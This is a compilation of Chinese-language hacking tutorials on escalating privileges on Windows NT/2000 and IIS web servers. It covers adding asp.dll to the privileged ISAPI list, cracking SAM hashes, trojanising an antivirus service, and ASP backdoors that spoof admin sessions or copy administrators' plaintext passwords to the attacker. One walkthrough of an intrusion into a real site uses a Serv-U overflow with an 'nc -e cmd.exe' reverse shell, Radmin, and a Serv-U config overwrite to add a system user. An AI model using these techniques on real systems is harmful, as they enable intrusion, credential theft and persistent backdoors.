把asp.dll加入特權的dll一族之中.提高步驟爲:
<1>先查看有特權一話有哪些.
<2>加asp.dll加入特權一族
好了,下面咱們就來實踐這個過程.
1)查看有特權的dll文件:
命令爲:cscript adsutil.vbs get /W3SVC/InProcessIsapiApps
獲得顯示爲:
C:\\Inetpub\\AdminScripts>cscript adsutil.vbs get /W3SVC/InProcessIsapiApps
Microsoft (R) Windows 腳本宿主版本 5.1 for Windows
版權全部(C) Microsoft Corporation 1996-1999. All rights reserved.
InProcessIsapiApps : (LIST) (5 Items)
"C:\\WINNT\\system32\\idq.dll"
"C:\\WINNT\\system32\\inetsrv\\httpext.dll"
"C:\\WINNT\\system32\\inetsrv\\httpodbc.dll"
"C:\\WINNT\\system32\\inetsrv\\ssinc.dll"
"C:\\WINNT\\system32\\msw3prt.dll"
看到沒有,他說明的是有特權限一族爲:idq.dll httpext.dll httpodbc.dll ssinc.dll msw3prt.dll
這幾個文件,不一樣的機子,可能會不一樣.
2)把asp.dll加入特權一族:
由於asp.dll是放在c:\\winnt\\system32\\inetsrv\\asp.dll (不一樣的機子放的位置不必定相同)
咱們如今加進去cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\\WINNT\\ system32\\idq.dll" "C:\\WINNT\\system32\\inetsrv\\httpext.dll" "C:\\WINNT\\system32\\inetsrv\\httpodbc.dll" "C:\\WINNT\\system32\\inetsrv\\ssinc.dll" "C:\\WINNT\\system32\\msw3prt.dll""c:\\winnt\\system32\\inetsrv\\asp.dll"
好了,如今你能夠用cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 來查看是否是加進去
了,注意,用法中的get和set,一個是查看一個是設置.還有就是你運行上面的你要到C:\\Inetpub\\AdminScripts>這個目錄下.
那麼若是你是一個管理員,你的機子被人用這招把asp提高爲system權限,那麼,這時,防的方法就是把asp.dll T出特權一族,也就是用set這個命令,覆蓋掉剛纔的那些東東.
例:cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\\WINNT\\system32\\idq.dll" "C:\\WINNT\\system32\\inetsrv\\httpext.dll" "C:\\WINNT\\system32\\inetsrv\\httpodbc.dll" "C:\\WINNT\\system32\\inetsrv\\ssinc.dll" "C:\\WINNT\\system32\\msw3prt.dll"
這樣就能夠了,當你再用cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 這個語句查之時,若是沒有看見asp.dll,
說明,asp的權限又恢復到之前的權限.
--------------------------------------------------------------------------------
-- --
　　winNT/2000提高權限
　　Windows NT/2000 通用的提高方法
　　攻擊者在得到系統必定的訪問權限後一般要把本身的權限提高到管理員組，這樣攻擊者就控制了該計算機系統。這主要有如下幾種方法：1.得到管理員密碼，下次就能夠用該密碼進入系統； 2. 先新建一個用戶，而後把這個普通添加到管理員組，或者乾脆直接把一個不起眼的用戶如guest 添加到管理員組； 3. 安裝後門。
　　本文簡要介紹在 Windows NT4和 Windows 2000 裏攻擊者經常使用的提高權限的方法。下面是具體方法：
　　方法1 ：下載系統的 %windir%\\repair\\sam.*（WinNT 4 下是sam._ 而Windows2000下是sam ）文件，而後用L0pht 等軟件進行破解，只要能拿到，肯花時間，就必定能夠破解。
　　問題：（1 ）攻擊者不必定能夠訪問該文件（看攻擊者的身份和管理員的設置）；（2 ）這個文件是上次系統備份時的賬號列表（也多是第一次系統安裝時的），之後更改賬號口令的話，就沒用了。
　　方法2 ：使用pwdump（L0pht 自帶的，Windows 2000下無效）或者pwdump2 ，取得系統當前的用戶列表和口令加密列表，而後用L0pht 破解這個列表。
　　問題：普通用戶不能成功運行pwdump類程序（沒有權限），例如：使用unicode漏洞進入系統時是IUSR_computer 身份，該用戶通常只屬於guests組的，運行pwdump類程序就會失敗。
　　（以上兩種是離線的）
　　方法3 ：使用 Enum 等程序進行遠程破解，猜口令。enum可使用指定的字典對遠程主機的某個用戶進行破解。
　　問題：（1 ）若是系統設置了賬號鎖定的話，破解幾回失敗，該賬號就鎖定了，暫時不能再破解；（2 ）要遠程系統開放 Netbios鏈接，就是 TCP的139 端口，若是用防火牆過濾了的話 Enum 就沒法鏈接到主機。
　　（以上方法是經過破解得到密碼的，還有直接把當前用戶提高權限或者添加用戶到管理員組的方法。）
　　方法4 ：GetAdmin（WinNT 4 下）、PipeUpAdmin （Windows 2000下），在本機運行能夠把當前用戶賬號加入管理員組。而 PipeUpAdmin則比較厲害，普通用戶和Guests組用戶均可以成功運行。
　　問題：GetAdmin在 SP4有補丁修復了，不能用於高於 SP4的 WinNT 4系統，固然後來又有GetAdmin的加強版本，不過在 SP6a 下好像都不能成功運行。
　　注：這一方法利用了 WinNT 4系統的安全漏洞，能夠安裝補丁解決這一問題。
　　（此外還有變通的方法。）
　　方法5 ：在WinNT 4 和 Windows 2000 註冊表裏指定用戶Shell 程序（Explorer.exe）
　　時沒有使用絕對路徑，而是使用了一個相對路徑的文件名（考慮到兼容性問題）。
　　因爲在系統啓動時程序的搜索順序問題使得 %Systemdrive%\\Explorer.exe（操做系統安裝的跟目錄下的Explorer.exe）程序執行，這提供了攻擊者一個機會在用戶下次登陸時執行他本身的程序。
　　問題：攻擊者必須有安裝系統邏輯盤跟目錄的寫權限才行，而通常管理員都設置該目錄普通用戶禁寫。
　　注：這種方法利用了 WinNT 4/Windows 2000 系統的安全漏洞，能夠安裝補丁解決這種問題。
　　方法6 ：木馬：上傳木馬，而後運行木馬，系統重起動後，木馬就是本地登陸用戶的身份了，而後攻擊者鏈接後就有了本地登陸用戶的權限。由於通常老是管理員本地登陸系統，所以這樣極可能就得到了管理員的權限。
　　問題：（1 ）殺毒軟件或病毒防火牆可能阻止木馬運行，還有可能把木馬殺死。
　　（2 ）有的木馬不能在Guests組身份下運行，這可能與它添加自動運行的方式有關；如沒有權限改寫註冊表的自動運行位置，不能寫入%system% \\ system32目錄（通常的木馬都改變文件名，而後寫入系統目錄，若是沒有寫入權限系統目錄，就不能成功執行木馬）。
　　解決：不過也有用壓縮程序（不是一般說的壓縮程序，這種壓縮程序把可執行程序壓縮後，文件變小了，可是仍然能夠正常執行）將木馬壓縮，從而逃過殺毒軟件的特徵碼檢測。我曾使用Aspack成功壓縮了一個木馬，逃過了金山毒霸正式版的檢測。不過也有的木馬Aspack壓縮不了，如冰河。
　　方法7 ： Gina、GinaStub木馬。雖然這個也叫木馬，可是它的功能和上邊的那種大不相同，由於通常的木馬是在對方安裝一個server端，一旦運行就可使用client端鏈接到server端，並進行操做。而 ginastub 通常只有一個動態鏈接庫文件，須要手工安裝和卸載，他的功能也不是使用 client端控制server端，它僅僅就是捕獲用戶的登陸密碼。
　　問題：安裝較麻煩，成功的可能性低，並且安裝不當會形成被安裝的系統不能啓動。
　　注：這一方法利用的不是系統的安全漏洞，所以不能經過安裝補丁解決這一問題。關於Gina，能夠參見個人另外一篇文章《WinLogon登陸管理和GINA簡介》
　　方法8 ：本地溢出。緩衝區溢出是進行攻擊的最好辦法，由於通常均可以得到系統權限或者管理員權限；不過不少遠程溢出攻擊不須要事先有執行程序的權限，而本地溢出就剛好適合提高權限。Win NT4 的 IIS4 的 ASP擴展有一個本地溢出漏洞，Windows 2000的靜態圖像服務也有一個溢出漏洞，利用該漏洞，攻擊者能夠得到系統權限。固然 Windows NT 和 Windows 2000 還有不少程序有溢出漏洞，這是這些程序不是總在運行，所以被利用的可能性比較小。
　　問題：（1 ）ASP 擴展的溢出漏洞須要攻擊者有向網站的腳本目錄的寫權限，才能把攻擊程序放到網站上，而後執行。
　　（2 ）靜態圖像服務缺省沒有安裝，只有用戶在 Windows 2000 上安裝靜態圖像設備（如數碼相機、掃描儀等）時才自動安裝。
　　注：這種方法利用了 WinNT 4/Windows 2000 系統的安全漏洞，能夠安裝補丁解決這種問題。
　　Windows 2000專用提高漏洞方法方法1 ： Windows 2000 的輸入法漏洞，利用這個漏洞任何人能夠以LocalSystem 身份執行程序，從而能夠用來提高權限，不過該漏洞通常限於物理接觸 Windows 2000 計算機的人。固然若是開放了終端服務的話，攻擊者也能夠遠程利用該漏洞。
　　注：這一方法利用了 Windows 2000 系統的安全漏洞，能夠安裝補丁解決這一問題。
　　方法2 ：利用 Windows 2000 的 Network DDE DSDM 服務漏洞普通用戶能夠LocalSystem 身份執行任意程序，能夠藉此更改密碼、添加用戶等。Guests組用戶也能夠成功利用該漏洞。
　　問題：這個服務缺省沒有啓動，須要啓動這個服務。
　　注：這一方法利用了 Windows 2000 系統的安全漏洞，能夠安裝補丁解決這一問題。
　　方法3 ：Windows 2000的 TELNET 服務進程創建時，該服務會建立一個命名管道，並用它來執行命令。可是，該管道的名字能被預見。若是 TELNET 發現一個已存在的管道名，它將直接用它。攻擊者利用此漏洞，能預先創建一個管道名，當下一次 TELNET 建立服務進程時，便會在本地 SYSTEM 環境中運行攻擊者代碼。
　　注：這一方法利用了 Windows 2000 系統的安全漏洞，能夠安裝補丁解決這一問題。
　　方法 4 ：WINDOWS 2K存在一個利用 Debug Registers提高權限的漏洞。若是攻擊者能在 WIN2K中運行程序，利用此漏洞，他至少能取得對 %Windir%\\SYSTEM32和註冊表HKCR的寫權。由於x86 Debug Registers DR0-7 對於全部進程都是全局共享的，所以在一個進程中設置硬件斷點，將影響其它進程和服務程序。
　　注：這一方法利用了 Windows 2000 系統的安全漏洞，不過到目前爲止微軟仍然沒有補丁能夠安裝，可是漏洞攻擊程序已經出現了，所以只能堵住攻擊者的入口來阻止利用該漏洞。
-------------------------------------------------------------------------------- --
-- 巧妙配合asp木馬取得後臺管理權限頂(這個但是經典。。。本身體會我很少說了)

前段時間氾濫成災的動網論壇上傳漏洞以及最近連續不斷的各類asp系統暴露的上傳漏洞，可能不少朋友手中有了不少webshell的肉雞，至於選擇怎麼樣這些小雞的方式也是因人而異，有人繼續提高權限，進一步入侵，也有人只是看看，馬兒放上去了過了就忘記了，也有一些朋友，當webshell的新鮮勁兒過去了後臺的神祕感和誘惑力也就大大增長。其實，對不少功能強大的系統而言，拿到後臺也就是拿到了一個好的後門了，呵呵............可是如今比較新的版本的不少asp系統密碼都是MD5加密而後配合嚴格的驗證程序來驗證的，可是咱們就沒有辦法突破這些限制了嗎？no!我今天就是要說怎麼突破這些限制讓咱們直奔後臺，有馬兒廄是好辦事，follow
me............
session欺騙篇
首先簡單說一下通常asp系統的身份驗證原理。
通常來講，後臺管理員在登陸頁面輸入帳號密碼後，程序會拿着他提交的用戶名密碼去數據庫的管理員表裏面找，若是有這我的的帳號密碼就認爲你是管理員，而後給你一個表示你身份的session值。或者程序先把你的用戶名密碼提取出來，而後到數據庫的管理員表裏面取出管理員的帳號密碼來和你提交的相比較，若是相等，就跟上面同樣給你個表示你身份的sesion值。而後你進入任何一個管理頁面它都要首先驗證你的session值，若是是管理員就讓你經過，不是的話就引導你回到登陸頁面或者出現一些奇奇怪怪的警告，這些都跟程序員的我的喜愛有關。
知道了原理，咱們如今的一個思路就是經過咱們的asp木馬來修改它的程序而後拿到一個管理員session，這樣的話儘管咱們沒有管理員密碼，可是咱們同樣在後臺通行無阻了。我把這種方法稱爲session欺騙。限於篇幅不能每一個系統都能詳細說明，本文僅以動力文章系統爲例來講明。
動力文章系統3.51，（圖一）
圖一
其實動力文章系統的全部版本所有通殺，包括動易。你們能夠本身實踐一下。
咱們先來看一下它的驗證內容。動力文章3.51的驗證頁面在Admin_ChkLogin.asp
，其驗證內容以下：
............
else
rs("LastLoginIP")=Request.ServerVariables("REMOTE_ADDR")
rs("LastLoginTime")=now()
rs("LoginTimes")=rs("LoginTimes")+1
rs.update
session.Timeout=SessionTimeout
session("AdminName")=rs("username")
rs.close
set rs=nothing
call CloseConn()
Response.Redirect "Admin_Index.asp"
前面省略號是用戶名密碼不正確的驗證，直到else，看一下，若是用戶名密碼正確就給你兩個session值：
session.Timeout=SessionTimeout
session("AdminName")=rs("username")
咱們在看一下其餘管理頁面是怎麼驗證session的，admin_index.asp一開始就這樣：
if session("AdminName") = "" then response.Redirect "Admin_Login.asp"end if
看起來彷佛很嚴密，可是咱們看一下，它這裏值驗證一個AdminName的session，只要咱們的session內容是AdminName的話不就能夠經過了？好，咱們開工，先去弄到它的管理員帳號再說，這個不要我教你了吧？到他網站逛一下或者直接一點下載它的數據庫來看均可以知道。咱們找個頁面來改一下，我找一個比較沒人而內容較多的頁面FriendSite.asp（友情連接頁面）來改，呵呵，這樣管理員也很難查得出來啊。用asp木馬的編輯功能來編輯一下它的內容。在他頁面下隱蔽處加上下面幾句話：
dim id
id=trim(request("qwe"))
if id="120" then
session("AdminName")="admin" '這裏是假設的，實際操做中能夠改爲你想要得管理員帳號
end if
我簡單說一下這句話的意思，就是說從地址欄取得hehe的值，若是hehe=120的話，那麼系統就給咱們一個值爲admin的session。好了，咱們輸入看一下，圖二：
圖二
看到有什麼異常嗎，沒有吧？仍是正常頁面，可是咱們接着在地址欄中輸入它的後臺管理首頁看看，是否是進去了？圖三：
圖三
呵呵，別作壞事哦............
小結一下：咱們先找到弄到管理員帳號，而後找到它的驗證頁面，根據它的驗證內容來寫入咱們要的後門。不一樣的系統有不一樣的驗證方式，好比青創文章系統它不但要驗證你的用戶名還要驗證等級，可是咱們整體思路仍是同樣，就是他驗證什麼咱們就加入什麼。
密碼竊探篇
能夠說上述方法在動網論壇或者其餘論壇面前是蒼白無力的，由於通常論壇因爲交互性較強，因此在驗證上考慮了不少。以動網爲例，你要登陸後臺，他先驗證你有沒有先登陸了前臺，沒有的話就給你返回一個錯誤頁面。你登陸前臺後系統會給你一個seession來記錄你的CacheName和你的ID，而後在你登陸後臺的時候拿出來比較你先後臺身份是否一致，一直就經過，不然kill，面對這樣嚴格的驗證，難道咱們就沒有辦法基後臺了嗎？對，沒有了（誰拿雞蛋扔我？這麼浪費。），可是咱們能夠想新的辦法，既然驗證這麼嚴格，那麼我若是拿着密碼光明正大的進去呢？所以，這裏一個新的思路就是拿到它的明文密碼。何時有明文密碼呢？對了，就在管理員登陸的時候。好，咱們就在那裏作手腳，把它登陸的密碼發給咱們，而後咱們拿和它的密碼去登陸。呵呵，是否是很像 sniffer啊？在下在前幾個月剛和好兄弟潛龍在野利用硬件sniffer配合省網安局的人端掉一個非法電影網站，足足4000G的硬盤，幾十臺服務器，一個字：爽
好了，咱們開始修改它的程序。編輯login.asp，加入如下幾句話：
if not isnull(trim(request("username"))) then
if request("username")="admin" then
sql="update [Dv_Vser] set UserEmail=(select userpassword from
[Dv_User]
where username=\'"& request("username")&"\') where
UserName=\'aweige\'"
conn.execute(sql)
end if
end if
這幾句話的意思就是說若是admin（假設的，實際操做中改成你要的管理員名字）登陸成功就更新數據庫，把他的密碼放到我資料的E-mail中。固然，你必須先在論壇裏註冊一個用戶名。結果如圖四：
圖四
還有，若是是動網7.0如下的默認數據庫admin表名和7.0以上有點不同，因此實際操做中不可生搬硬套。
後記：
對於以上兩種方法直到目前爲止我還想不出任何比較有效的解決方法，由於你的網站被人家放了馬，你根本就沒辦法去阻止人家去插入，要是誰有好的解決方法記得告訴我。
另外，但願你們不要去搞破壞，那時我真的不肯看到的，也祝全部的網管們好運，但願大家不會碰上craker們。
--
--
巧用asp木馬和KV2004獲得管理員權限
重來沒寫過什麼文章，這是第一次，寫的很差請你們原諒，高手也不要取笑哦。這裏也沒什麼技術可言，只是我這個菜鳥的一點心得，ok開始。。。
前段時間動網的UPfile.asp漏洞可謂鬧的沸沸揚揚，這個漏洞確實很厲害，相信很多新手和我同樣種了很多後門在有動網的網站上，可是asp木馬的權限確實很底，除了刪點文章，刪點圖片好象沒什麼用了。不行不獲得管理員權限簡直就辜負了發現這個漏洞的高手們~v~。好，想辦法提高權限，我找啊找！網上提高權限的方法幾乎都用過了，都沒什麼用，補丁打的很全啊！接下來用findpass想解開管理員的密碼，又失敗，findpass要管理員權限纔有用。用 pslist看看暈裝的是瑞星+天網，網上的大部分工具趕上這個防護組合通常都沒用了。種木馬？不行一來
權限太底，二來在瑞星殺天網堵的包圍下不多能活出來的。作個添加用戶權限的bat文件想放到啓動組中去，這個方法雖然有點傻可是有必定的可行性，暈又是權限不夠加不進去。c盤下的 "rogram Files" "winnt" "Documents and Settings"三個文件甲都沒有寫權限，更不要說註冊表了。鬱悶了，給管理員留了句話，而後匆匆下線。
第2天上來一看，嘿嘿圖被改回來了，管理員應該發現了，此次更不容易得手。登上 asp木馬進去看了一下，昨天傳上去的幾個exe被刪了，還好asp木馬活下來了，咦！c盤多了文件甲叫 KV2004，原來管理員把瑞星卸了，安了個 kv2004，進Program Files看看確實瑞星被卸了。（這裏說一下，大部分的殺毒軟件默認的安裝路徑c:\\Program Files\ \,可是kv默認的安裝路徑是c:\\kv2004\\）到這裏機會就來了咱們能夠把執行文件捆綁在kv2004上，跟隨kv一塊兒啓動。由於 kv不在 "rogram Files" "winnt" "Documents and Settings"這三個文件甲中，很大可能我能夠修改
或者上傳文件。行動！在kv2004下隨便找個htm文件刪除：(看看有無寫刪權限）
C:\\>del c:\\kv2004\\GetLicense.htm
拒絕訪問
奇怪了，再來看看文件甲屬性
C:\\>attrib c:\\kv2004
S R C:\\KV2004
哦是隻讀。
C:\\>attrib -r -s c:\\kv2004
ok！在試試
C:\\>del c:\\kv2004\\GetLicense.htm
成功了！好寫個起用賬號和提高權限的bat文件，而後把bat文件和kv2004的系統服務文件KVSrvXP.exe捆綁起來，（注意多下種捆綁器，捆綁一
次用kv2004來掃描一次，由於不少捆綁器生成的文件kv會把他做爲病毒來處理掉）準備上傳了，先刪掉原來的KVSrvXP.exe。
C:\\>del c:\\kv2004\\KVSrvXP.exe
拒絕訪問
多是KVSrvXP.exe被windows調用中，刪不掉。沒辦法了嗎？不，刪不掉我更名
C:\\>ren c:\\kv2004\\KVSrvXP.exe kv.exe
OK!而後用asp木馬把修改了的KVSrvXP.exe上傳到kv2004中，接下來就去睡覺把。
4個小時後登上來用：
net user 起用的賬戶
已經在administrators組中，接下來要關防火牆，關殺毒軟件，仍是種木馬你隨便我了，哈哈！
我以爲入侵沒什麼固定的模式，具體狀況具體分析，殺毒軟件一樣也能夠幫咱們忙，這裏我只提供了一種思路。請你們指教。
如何繞過防火牆提高權限
本文講的重點是webshell權限的提高和繞過防火牆，高手勿笑。
廢話少說，我們進入正題。
首先肯定一下目標：http://www.sun***.com ，常見的虛擬主機。利用Upfile的漏洞相信你們得到webshell不難。咱們此次得到這個webshell，不是DVBBS，而是自由動力3.6的軟件上傳過濾不嚴。網站http://www.sun***.com/lemon/Index.asp 是自由動力3.6文章系統。Xr運用 WinHex.exe和WSockExpert.exe上傳一個網頁木馬newmm.asp，用過動鯊的 door.exe的人都知道，這個是上傳asp木馬內容的。因而，上傳海洋2005a，成功得到webshell。
測試一下權限，在cmd裏運行set，得到主機一些信息，系統盤是D盤，也說明了咱們的webshell有運行權限的。那咱們看看C盤有什麼呢？難道是雙系統？瀏覽後發現沒有什麼系統文件，只有一些垃圾文件，暈死。不要緊，再來檢查一下，虛擬主機都有serv-u的，這臺也不例外，是5.0.0.8的。呵呵，是有本地溢出的呀，挖哈哈。
思路：上傳serv-u本地溢出文件srv.exe和nc.exe利用nc來反鏈接得到系統shell。你們是否是發現海洋2005a那個上傳的組件很差用（反正我總遇到這個問題），不要緊，用rain改的一個無組件上傳，一共有3個文件，up.htm, upload.asp和 uploadclass.asp。upload.asp和uploadclass.asp上傳到同一個文件夾，up.htm是本地用的，修改up.htm 裏的連接地址爲：http://www.sun***.com/lemon/upload.asp就能夠上傳了。
傳上了srv.exe和nc.exe在H:\\long\\sun***\\lemon（網站目錄）後，發現沒有運行權限。不要緊，根據經驗，通常系統下 D: \\Documents and Settings\\All Users\\是應該有運行權限的。因而想把文件copy過去，可是發現咱們的 webshell沒有對D盤寫的權限，暈死。
能夠瀏覽D:\\program files\\serv-u\\ServUDaemon.ini,不能改，難道要破解serv-u的密碼，暈，不想。
不能夠這麼就泄氣了，我忽然想到爲何系統不放在C盤了，難道C盤是FAT32分區的？（後來證實了咱們的想法。這裏說一下，若是主機有win98的系統盤，那裏99%是FAT32分區的。咱們還遇到過裝有Ghost的主機，爲了方便在DOS下備份，它的備份盤通常都是FAT分區的。）若是系統盤是 FAT32分區，則網站就沒有什麼安全性可言了。雖然C盤不是系統盤，可是咱們有執行權限。呵呵，copy srv.exe和nc.exe到c:\\，運行 srv.exe "nc.exe –e cmd.exe 202.*.*.* 888",這裏的202.*.*.*是咱們的肉雞，在這以前咱們已經在肉雞上運行了nc –l –p 888。咱們在學校內網裏，沒有公網ip，不爽-ing。
咱們成功得到一個系統shell連上肉雞。（看起來簡單，其實這裏咱們也遇到過挫折，咱們發現有些版本的nc竟然沒有-e這個參數，還覺得全世界nc功能都同樣。後來又發現不一樣版本的nc互連不成功，會出現亂碼，沒辦法用。爲此，上傳 n次，錯誤n次，傻了n次，後來終於成功了。作黑客還真得有耐心和恆心。）
高興之餘，咱們仍不知足，由於這個shell實在是太慢了。因而，想用咱們最經常使用的Radmin，其實管理員一按Alt+Ctrl+Del，看進程就能發現 r_server了，可是仍是喜歡用它，是由於不會被查殺。好了，上傳admdll.dll，raddrv.dll，r_server.exe到H:\\ long\\sun***\\lemon，再用剛纔nc獲得的 shell把它們copy到d:\\winnt\\system32\\下，分別運行： r_server /install , net start r_server , r_server /pass:rain /save 。
一陣漫長的等待，終於顯示成功了。興沖沖用radmin連上去，發現鏈接失敗。暈死，忘了有防火牆了。上傳pslist和pskill上去，發現有 backice，木馬克星等。Kill掉他們雖然能夠登錄，但服務器重啓後仍是不行，終不是長久之計呀。防火牆是不防21，80等端口的，因而，咱們的思路又回到了serv-u上了。把他的 ServUDaemon.ini下載下來，覆蓋本機的ServUDaemon.ini，在本機的serv-u上添加一個用戶名爲xr，密碼爲rain的系統賬號，加上全部權限。再用老辦法，上傳，用shell寫入D:\\program files\\serv-u\ \裏，覆蓋掉原來的ServUDaemon.ini。雖然又等了n長時間，可是成功了，因而用flashfxp連上，發生 530錯誤。鬱悶，怎麼又失敗了。（根據經驗這樣應該就能夠了，但爲何不行沒有想通，請高手指點。）
無論了，咱們重啓serv-u就ok 了，怎麼重啓呢，開始想用 shutdown重啓系統，但那樣咱們就失去了nc這個shell，還可能被發現。後來，眼睛一亮，咱們不是有pskill嗎？剛纔用pslist發現有這個進程：ServUDaemon 。把它kill了。而後再運行D:\\program files\\serv-u\\ ServUAdmin.exe ，這裏要注意不是ServUDaemon.exe 。
好了，到這裏，咱們直接ftp上去吧，ls一下，哈哈，系統盤在個人掌握下。咱們能不能運行系統命令呢？是能夠的，這樣就能夠：
ftp>quote site exec net user xr rain /add
在webshell上運行net user，就能夠看見添加成功了。
整個入侵滲透到這就結束了，在一陣後清理打掃後。咱們就開始討論了。其實，突破防火牆有不少好的rootkit能夠作到的，可是咱們以爲系統自帶的服務纔是最安全的後門。
CAcls命令在提權中的使用

cacls.exe c: /e /t /g everyone:F #把c盤設置爲everyone能夠瀏覽 cacls.exe d: /e /t /g everyone:F #把d盤設置爲everyone能夠瀏覽 cacls.exe e: /e /t /g everyone:F #把e盤設置爲everyone能夠瀏覽 cacls.exe f: /e /t /g everyone:F #把f盤設置爲everyone能夠瀏覽 F:\safe\溢出工具\sqlhello2>cacls 顯示或者修改文件的訪問控制表(ACL) CACLS filename [/T] [/E] [/C] [/G user:perm] [/R user [...]] [/P user:perm [...]] [/D user [...]] filename 顯示 ACL。 /T 更改當前目錄及其全部子目錄中 指定文件的 ACL。 /E 編輯 ACL 而不替換。 /C 在出現拒絕訪問錯誤時繼續。 /G user:perm 賦予指定用戶訪問權限。 Perm 能夠是: R 讀取 W 寫入 C 更改(寫入) F 徹底控制 /R user 撤銷指定用戶的訪問權限(僅在與 /E 一塊兒使用時合法)。 /P user:perm 替換指定用戶的訪問權限。 Perm 能夠是: N 無 R 讀取 W 寫入 C 更改(寫入) F 徹底控制 /D user 拒絕指定用戶的訪問。 在命令中可使用通配符指定多個文件。